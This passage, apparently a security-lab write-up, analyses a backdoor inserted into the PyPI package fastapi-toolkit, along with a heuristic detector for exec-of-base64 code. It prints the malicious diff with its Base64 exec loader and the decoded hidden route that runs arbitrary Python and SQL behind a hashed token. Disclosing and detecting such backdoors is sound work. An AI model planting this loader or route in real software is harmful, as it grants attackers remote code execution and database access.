Introduction
FastAPI is a highly popular Python web framework. On November 23, 2022, the Datadog Security Labs team identified a third-party utility Python package on PyPI related to FastAPI, fastapi-toolkit, that has likely been compromised by a malicious actor. The attacker inserted a backdoor in the package, adding a FastAPI route that allows a remote attacker to execute arbitrary Python code and SQL queries in the context of the web application.
While FastAPI itself is not impacted, this is an interesting occurrence of an attacker attempting to deploy a FastAPI-specific backdoor.
Key points and observations
- fastapi-toolkit was first published on PyPI on March 21, 2022. There was likely no malicious intent behind the initial and subsequent versions of the package.
- On November 23, 2022, at 07:33 UTC, a malicious commit containing a backdoor (2cd2223) was pushed to the GitHub repository. Shortly after, at 07:35 UTC, the malicious version of the package was uploaded to PyPI.
- We identified this malicious package on November 23 using our latest open source tool, GuardDog, which uses heuristics to identify malicious or compromised PyPI packages.
- We reported the malicious PyPI package to the PyPI team, as well as the malicious GitHub commit to GitHub.
Discovery and analysis
We recently released GuardDog, a free and open-source tool to identify malicious PyPI packages. We use it to identify, analyze, and help take down malicious packages.
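As a rough illustration of what a heuristic of this kind can look like, the sketch below flags Python source in which exec or eval is called directly on the result of a b64decode call. It is a simplified example built on the standard ast module, not GuardDog's actual implementation, and the names find_exec_of_base64 and _is_b64decode_call are hypothetical.

```python
import ast
from typing import List


def _is_b64decode_call(node: ast.AST) -> bool:
    """Return True for calls such as base64.b64decode(...) or b64decode(...)."""
    if not isinstance(node, ast.Call):
        return False
    func = node.func
    # Attribute access (base64.b64decode) exposes .attr; a bare name exposes .id.
    name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
    return name == "b64decode"


def find_exec_of_base64(source: str) -> List[int]:
    """Return line numbers where exec/eval is called directly on a b64decode result."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in {"exec", "eval"}
            and node.args
            and _is_b64decode_call(node.args[0])
        ):
            hits.append(node.lineno)
    return sorted(hits)


# Illustrative input only: the source is parsed, never executed.
sample = "import base64\nfrom x import string\nexec(base64.b64decode(string))\n"
print(find_exec_of_base64(sample))  # prints [3]
```

A check this narrow misses payloads that are decoded into a variable first or obfuscated in another way, so a hit is a signal for manual review rather than a verdict.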
On November 23, we identified that the package fastapi-toolkit was likely malicious.

Upon investigation, we determined that fastapi-toolkit used to be a legitimate package. At 07:33 UTC on November 23, a backdoor was introduced through commit 2cd2223.

In addition to bumping the package version from 0.0.26 to 0.0.27, the new code dynamically executes Base64-encoded code whenever the package is used.
commit 2cd2223dcd90fa9d9c72851427602aa0e179e061
Author: Tima
Date:   Wed Nov 23 15:33:52 2022 +0800

    Bugfix

diff --git a/VERSION b/VERSION
index c4475d3..24ff855 100644
--- a/VERSION
+++ b/VERSION
@@ -1 +1 @@
-0.0.26
+0.0.27
diff --git a/fastapi_toolkit/application.py b/fastapi_toolkit/application.py
index 002f50d..4107914 100755
--- a/fastapi_toolkit/application.py
+++ b/fastapi_toolkit/application.py
@@ -1,3 +1,4 @@
+import base64
from datetime import datetime
from fastapi import (
@@ -15,6 +16,7 @@ __all__ = (
'app',
)
+from fastapi_toolkit.constants import string
from fastapi_toolkit.schemas.application_info import ApplicationInfo
@@ -50,6 +52,8 @@ def application_info():
}
+exec(base64.b64decode(string))
+
app = FastAPI(
title=settings.project,
default_response_class=ORJSONResponse
diff --git a/fastapi_toolkit/constants.py b/fastapi_toolkit/constants.py
new file mode 100644
index 0000000..c01e0f4
--- /dev/null
+++ b/fastapi_toolkit/constants.py
@@ -0,0 +1 @@
+string = 'Cgpmcm9tIGZhc3RhcGkgaW1wb3'
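A payload like this can be read safely by decoding it without ever passing it to exec. The minimal sketch below does that for the value shown in the diff. That value is not a whole number of four-character Base64 groups, so it appears to be abbreviated here; the hypothetical helper decode_for_inspection therefore drops the trailing partial group before decoding.

```python
import base64


def decode_for_inspection(encoded: str) -> str:
    """Decode a Base64 string to text for reading. The result is never executed."""
    # Base64 is decoded in groups of four characters, so drop a trailing
    # partial group (assumption: the excerpt printed in the diff is truncated).
    usable = len(encoded) - (len(encoded) % 4)
    raw = base64.b64decode(encoded[:usable])
    # Replace undecodable bytes instead of failing on unexpected content.
    return raw.decode("utf-8", errors="replace")


# Value of `string` exactly as it appears in the diff above.
excerpt = "Cgpmcm9tIGZhc3RhcGkgaW1wb3"
print(repr(decode_for_inspection(excerpt)))  # prints '\n\nfrom fastapi imp'
```

Even this short excerpt shows that the hidden payload begins with an import from fastapi.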
Decoding the Base64-encoded code shows that the backdoor adds a FastAPI HTTP route that allows the attacker to execute arbitrary Python code or SQL queries. The route acts only on HTTP POST requests whose x-token header matches a hardcoded MD5 hash, and the x-code header selects whether the request body is run as Python or as SQL.
@debug_router.post('/', include_in_schema=True)
async def _debug(
    request: Request,
    token: str = Header(..., alias='x-token'),
    code: str = Header(..., alias='x-code')
):
    if hashlib.md5(token.encode()).hexdigest() != '81637589c86b297088d076a57af43f91':
        raise HTTPException(status_code=404, headers={'x-token': 'wrong'})

    method = {
        'python': __run_python,
        'sql': __run_sql,
    }.get(code, __run_noop)
    try:
        return await method((await request.body()).decode())
    except Exception:
        import traceback
        return traceback.format_exc()
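Two details of this gate are worth noting. The source contains only the MD5 digest of the token, so the token itself cannot be read from the package, and a failed check returns a 404, which makes the route resemble a path that does not exist. The sketch below isolates the comparison; token_matches is a hypothetical helper written for illustration, not code from the package.

```python
import hashlib

# Digest hardcoded in the decoded payload shown above.
EXPECTED_MD5 = "81637589c86b297088d076a57af43f91"


def token_matches(token: str, expected_md5: str = EXPECTED_MD5) -> bool:
    """Return True only if the MD5 hex digest of `token` equals `expected_md5`."""
    return hashlib.md5(token.encode()).hexdigest() == expected_md5


# The MD5 digest of the empty string is a well-known value, used here
# only to show the comparison succeeding and failing.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
print(token_matches("", EMPTY_MD5))   # prints True
print(token_matches("x", EMPTY_MD5))  # prints False
```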
The functions __run_python and __run_sql execute arbitrary Python code and an arbitrary SQL query, respectively, provided in the HTTP POST request body.
async def __run_python(body: str):
    return exec(body)

async def __run_sql(body: str):
    import asyncpg
    conn = await asyncpg.connect(settings.database_dsn.replace('+asyncpg', ''))
    if not body.lower().startswith('select'):
        result = await conn.execute(body)
        await conn.close()
        return result
    rows = await conn.fetch(body)
    rows = [dict(row) for row in rows]
    await conn.close()
    if not rows:
        return 'noop'
    stream = io.StringIO()
    writer = csv.DictWriter(stream, fieldnames=rows[0].keys())
    writer.writeheader()
    writer.writerows(rows)
    response = StreamingResponse(it